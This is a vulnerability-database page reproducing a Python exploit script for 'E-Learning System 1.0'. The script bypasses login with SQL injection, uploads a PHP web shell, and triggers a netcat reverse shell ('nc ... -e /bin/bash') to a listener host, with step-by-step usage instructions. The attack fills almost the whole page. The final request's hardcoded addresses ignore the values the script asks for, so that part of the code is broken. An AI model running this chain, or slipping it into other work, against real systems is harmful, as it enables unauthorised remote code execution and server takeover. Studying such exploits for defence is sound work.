Vulners
Lucene search
E-Learning System 1.0 - Authentication Bypass
# Exploit Title: E-Learning System 1.0 - Authentication Bypass & RCE
# Exploit Author: Himanshu Shukla & Saurav Shukla
# Date: 2021-01-15
# Vendor Homepage: https://www.sourcecodester.com/php/12808/e-learning-system-using-phpmysqli.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/caiwl.zip
# Version: 1.0
# Tested On: Kali Linux + XAMPP 7.4.4
# Description: E-Learning System 1.0 - Authentication Bypass Via SQL Injection + Remote Code Execution
#Step 1: run the exploit in python with this command: python3 exploit.py
#Step 2: Input the URL of the vulnerable application: Example: http://10.10.10.23/caiwl/
#Step 3: Input your LHOST where you want the reverse shell: Example: 10.9.192.23
#Step 4: Input your LPORT that is the port where the reverse shell will spawn: Example: 4444
#Step 5: Start a Netcat Listener on the port specified in Step 4 using this command: nc -lnvp 4444
#Step 6: Hit enter on the if your Netcat Listener is ready, and you will get a reverse shell as soon as you hit enter.
import requests
print('########################################################')
print('## E-LEARNING SYSTEM 1.0 ##')
print('## AUTHENTICATION BYPASS & REMOTE CODE EXECUTION ##')
print('########################################################')
print('Author - Himanshu Shukla & Saurav Shukla')
GREEN = '\033[32m' # Green Text
RED = '\033[31m' # Red Text
RESET = '\033[m' # reset to the defaults
#Create a new session
s = requests.Session()
#Set Cookie
cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'}
LINK=input("Enter URL of The Vulnarable Application : ")
#Authentication Bypass
print("[*]Attempting Authentication Bypass...")
values = {"user_email":"'or 1 or'", "user_pass":"lol","btnLogin":""}
r=s.post(LINK+'admin/login.php', data=values, cookies=cookies)
r=s.post(LINK+'admin/login.php', data=values, cookies=cookies)
#Check if Authentication was bypassed or not.
logged_in = True if("You login as Administrator." in r.text) else False
l=logged_in
if l:
print(GREEN+"[+]Authentication Bypass Successful!", RESET)
else:
print(RED+"[-]Failed To Authenticate!", RESET)
#Creating a PHP Web Shell
phpshell = {
'file':
(
'shell.php',
'<?php echo shell_exec($_REQUEST["cmd"]); ?>',
'application/x-php',
{'Content-Disposition': 'form-data'}
)
}
# Defining value for form data
data = {'LessonChapter':'test', 'LessonTitle':'test','Category':'Docs','save':''}
#Uploading Reverse Shell
print("[*]Uploading PHP Shell For RCE...")
upload = s.post(LINK+'/admin/modules/lesson/controller.php?action=add', cookies=cookies, files=phpshell, data=data, verify=False)
shell_upload = True if("window.location='index.php'" in upload.text) else False
u=shell_upload
if u:
print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET)
else:
print(RED+"[-]Failed To Upload The PHP Shell!", RESET)
print("[*]Please Input Reverse Shell Details")
LHOST=input("[*]LHOST : ")
LPORT=input("[*]LPORT : ")
print('[*]Start Your Netcat Listener With This Command : nc -lvnp '+LPORT)
input('[*]Hit Enter if your netcat shell is ready. ')
print('[+]Deploying The Web Shell...')
#Executing The Webshell
e=s.get('http://192.168.1.5/caiwl/admin/modules/lesson/files/shell.php?cmd=nc 192.168.1.2 9999 -e /bin/bash', cookies=cookies)
exit()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Jan 2021 00:00Current
7.4High risk
Vulners AI Score7.4